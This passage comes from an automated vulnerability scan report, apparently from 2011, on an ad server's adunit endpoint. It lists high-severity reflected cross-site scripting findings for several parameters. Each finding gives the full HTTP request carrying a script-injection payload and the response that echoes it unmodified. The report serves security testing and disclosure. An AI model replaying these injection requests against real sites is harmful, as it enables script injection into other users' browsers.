Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "9082673b85e086c70381cc03c1c1845a4d76fd9a"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:34:18 GMT
Content-Length: 2227
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:18 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:18 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
d=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=0&bidder=bidder03-sj-west13ead"><script>alert(1)</script>17c0bcecbe5&ioi=13672&ts=1317849575383&sig=e682501f8c01fe1c4019354e8f499890&cu=&dsi=None&clickURL=">
...[SNIP]...

3.20. http://as.chango.com/links/adunit/1.31784957539e+12 [datc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the datc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0522"><script>alert(1)</script>391af6259ec was submitted in the datc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+josea0522"><script>alert(1)</script>391af6259ec&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "8158b3de3bf08387e8525fd01f7cdf6f3a3c5fd1"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:34:18 GMT
Content-Length: 2230
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:18 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:18 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
id=wattpad.com&url=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san josea0522"><script>alert(1)</script>391af6259ec&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=0&bidder=bidder03-sj-west&ioi=13672&ts=1317849575383&sig=e682501f8c01fe1c4019354e8f499890&
...[SNIP]...

3.21. http://as.chango.com/links/adunit/1.31784957539e+12 [dc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the dc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af091"><script>alert(1)</script>e19a7ee16f3 was submitted in the dc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemediaaf091"><script>alert(1)</script>e19a7ee16f3&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "f5868203de9280f21b44fcd2ee41f6fb54c2cd02"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:19 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:19 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemediaaf091%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ee19a7ee16f3%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:19 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemediaaf091"><script>alert(1)</script>e19a7ee16f3&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=0&bidder=bidder03-sj-west&ioi=13672&ts=1317849575383&sig=e682501f8c01fe1c401
...[SNIP]...

3.22. http://as.chango.com/links/adunit/1.31784957539e+12 [dom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the dom request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3410b"><script>alert(1)</script>e875639c3a2 was submitted in the dom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com3410b"><script>alert(1)</script>e875639c3a2&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "c19bde51e79318fb6819c509279f981b85c912dd"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:19 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:19 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:19 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
CHANGO/B5866234.13;sz=300x250;ord=1317850459551;click1=http://as.chango.com/links/click1317850459.56?acid=10699&adid=13713&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories&dom=wattpad.com3410b"><script>alert(1)</script>e875639c3a2&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freewa
...[SNIP]...

3.23. http://as.chango.com/links/adunit/1.31784957539e+12 [eid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the eid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c658"><script>alert(1)</script>493dfe1f8c5 was submitted in the eid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon8c658"><script>alert(1)</script>493dfe1f8c5&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "006c48235ce5cff483fa2326ac3405c502a55649"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:34:21 GMT
Content-Length: 2209
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:21 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon8c658%22%3E%3Cscript%3Ealert%281%29%3C/script%3E493dfe1f8c5%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:21 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
;click1=http://as.chango.com/links/click1317850461.81?acid=10699&adid=13713&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon8c658"><script>alert(1)</script>493dfe1f8c5&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=0&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=0&bidder
...[SNIP]...

3.24. http://as.chango.com/links/adunit/1.31784957539e+12 [ht parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f36c7"><script>alert(1)</script>0735a5f57f5 was submitted in the ht parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250f36c7"><script>alert(1)</script>0735a5f57f5&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Content-Length: 466
Server: Chango RTB Server
ETag: "d1dc3f79511f633e6cb28cef53737edf38cfb808"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:34:22 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:22 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:22 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body style="width: 300px; height: 250f36c7"><script>alert(1)</script>0735a5f57f5px; margin: 0; padding: 0;">
...[SNIP]...

3.25. http://as.chango.com/links/adunit/1.31784957539e+12 [ibs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the ibs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 996f0"><script>alert(1)</script>6ebd514624f was submitted in the ibs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None996f0"><script>alert(1)</script>6ebd514624f&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "0c9e91612d0e73ab78a996ad58689ecf733ed273"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:22 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:22 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:22 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
866234.13;sz=300x250;ord=1317850462613;click1=http://as.chango.com/links/click1317850462.62?acid=10699&adid=13713&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None996f0"><script>alert(1)</script>6ebd514624f&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&k
...[SNIP]...

3.26. http://as.chango.com/links/adunit/1.31784957539e+12 [poo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the poo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62468"><script>alert(1)</script>d1df17537fc was submitted in the poo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p62468"><script>alert(1)</script>d1df17537fc&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "9d9701cdc8c7c08e62db80f02cb9718d78bad2a5"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:24 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:24 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:24 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
300x250;ord=1317850464785;click1=http://as.chango.com/links/click1317850464.79?acid=10699&adid=13713&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None&mw=1.0&poo=p62468"><script>alert(1)</script>d1df17537fc&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atyp
...[SNIP]...

3.27. http://as.chango.com/links/adunit/1.31784957539e+12 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b9c5"><script>alert(1)</script>48c2cd12581 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e1b9c5"><script>alert(1)</script>48c2cd12581&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "c385102889332dc6718469e9914aa31a7a179a69"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
